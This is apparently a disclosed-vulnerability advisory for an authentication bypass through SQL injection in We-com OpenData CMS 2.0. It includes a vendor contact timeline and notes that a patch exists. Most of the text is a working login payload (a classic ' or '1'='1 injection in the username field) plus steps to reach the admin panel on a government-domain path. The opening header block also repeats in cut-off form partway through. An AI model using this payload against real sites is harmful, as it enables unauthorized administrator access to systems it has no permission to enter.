# Exploit Title: We-com OpenData CMS 2.0 Authentication Bypass / SQL Injection
# Google Dork:N/A
# Date: 2020-04-17
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://www # Exploit Title: We-com OpenData CMS 2.0 Authentication Bypass / SQL Injection
# Google Dork:N/A
# Date: 2020-04-17
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://www.we-com.it/
# Version: 2.0
# Tested on: 5.5.0-kali1-amd64


---------------------------------------------------------


Vendor contact timeline:


2020-05-05: Contacting vendor through info@we-com.it
2020-05-26: A Patch is published in the version
2020-06-01: Release of security advisory




Authentication Bypass / SQL Injection in the opendata 2.0 CMS

PoC:

Payload(s)
USERNAME: admin' or '1' = '1'; -- -

PASSWORD: vvv

the SQL injection attack has resulted in a bypass of the login,to confirm you will get a reponse in header of the page with "okokokokokokokokokokokokokok"

But will not redirect you to the control panel so you wil need to do it manual

https://www.site.gov.it/admin/?mod=mod_admin

and we are now authenticated as "adminstrator".